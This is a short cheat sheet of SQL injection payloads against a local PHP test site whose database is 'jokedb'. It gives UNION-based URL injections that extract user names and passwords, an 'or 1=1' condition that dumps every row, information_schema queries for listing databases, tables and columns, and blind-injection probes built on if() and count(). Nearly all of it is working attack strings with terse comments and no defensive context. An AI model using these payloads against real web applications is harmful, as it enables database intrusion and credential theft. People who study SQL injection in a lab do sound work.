SQL injection

http://localhost/index.php?id=33 UNION SELECT 1,user,pass,4 from jokedb.users

// Query all the data
http://localhost/index.php?id=0 or 1=1

--UNION Inject and crack user name and password
select TABLE_SCHEMA FROM information_  schema.TABLES // Database name

// Guess the table name
http://localhost/index.php?id=33  UNION select 1,TABLE_NAME,3,4  FROM information_schema.TABLES where  TABLE_SCHEMA='jokedb'

// Guess the field name
select column_name from information_schema.columns where TABLE_SCHEMA='jokedb' and TABLE_NAME='users';
// Query user name and password
http://localhost/index.php?id=33 UNION SELECT 1,user,pass,4 from jokedb.users

// Blind note function
select if(1=1,'tiger','monkey')
// Guess whether the table name exists
SELECT * FROM region WHERE (id = 33) and 1<(select count(*) from jokedb.xss )